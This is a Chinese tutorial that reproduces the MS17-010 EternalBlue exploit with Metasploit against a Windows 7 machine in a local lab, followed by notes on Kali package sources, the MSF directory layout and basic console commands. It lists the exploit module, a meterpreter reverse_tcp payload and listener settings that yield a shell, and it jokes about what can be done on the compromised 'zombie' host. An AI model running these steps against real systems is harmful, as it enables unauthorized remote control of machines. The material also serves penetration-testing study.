一.介绍和准备
1、本文介绍Msf及MS17-010(永恒之蓝)复现
2、环境:kali(IP:192.168.1.184)、win7(IP:192.168.1.98)
3、使用的工具:metasploit、天境
4、准备:将kali更新到最新版本:终端打开后输入“ apt-get update && apt-get upgrade ” 完成后再输入“ apt-get dist-upgrade ”等待完成即可。
二.MSF介绍/MS17-010(永恒之蓝)复现
1、介绍:1)Metasploit:是一个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。详细介绍点我
2)MS17-010(永恒之蓝)漏洞原理是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让资源可互通。
2、使用天境对对win7进行扫描过后,发现MS17-010(永恒之蓝):
3、于是,打开kali进入msfconsole,seach ms17-010:
1)若出现:WARNING: No database support: No database YAML file; 终端输入“ msfdb init ” 即可。
2)若出现:cannot load such file -- bundler/setup;终端输入sudo gem install bundler、bundle update celluloid即可。
3)由于我的肉鸡是win7,所以吧use 2(use exploit/windows/smb/ms17_010_eternalblue);然后info看看:
4)设置一下目标/肉鸡、地址/IP(set 192.168.1.98)和Paylod(set payload windows/x64/meterpreter/reverse_tcp),然后show options,还需要设置一下控制端:
5)set lhost 192.168.1.184(kali的IP地址),设置好后exploit/run一下,然后用shell就进入win7:
6)既然都进到win7了,能干什么你们懂吧??哈哈哈。。。。。。。。
三.MSF常识
1、更新源:1)vi /etc/apt/sources.list
2)# kali官方源
deb http://http.kali.org/ kali-rolling main non-free contrib
deb-src http://http.kali.org/ kali-rolling main non-free contrib
#中科大源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
3)若更新出现错误,添加一下签名:
wget archive.kali.org/archive-key.asc //下载签名
apt-key add archive-key.asc //安装签名
2、MSF Kali下存放目录:/usr/share/MSF-framework/
3、1)Modules:用户用到的各种模块几乎都在这里。
2)Auxiliary:主要包含渗透测试中一些辅助性的脚本。
3)Encoders:各种编码工具 用于躲过入侵检测和过滤系统。
4)Exploits:主要包含了传说中的exp、0day、各种漏洞利用的脚本。
5)Nops: NOP (No Operation or Next Operation) sled,由于IDS/IPS检查数据包中不规则的数据。
6)Payloads :是攻击者发送给系统执行的指令(目标机执行);exploits是本地机执行作用于目标机;命名规则是:系统/类型/名称。
7)Post: 这个目录里放着msf 的exploits执行成功后,向目标机发送的一些功能性指令比如:提权,获取hash等。
8)Data:放工具和一些用户接口代码
9)Plugins:各种要用到的插件。
10)Scripts:这个目录下的文件大都是Meterpreter利用的脚本。
11)Tools:包含一些有用的脚本和零散的工具。
4、 1)search 搜索模块名和描述。
2)use:进入。
3)back :返回。
4)Banner命令,显示一个MSF的banner。
5)info 显示信息。
6)irb进入irb脚本模式。
7)jobs显示和管理作业
8)sleep:在限定的秒数内什么也不做。
9)unset/unsetg:解出一个或多个变量。
10)unload:卸载一个模块。
11) resource:运行储存一个文件中的命令。
12)route:查看一个会话的路由信息。
网友评论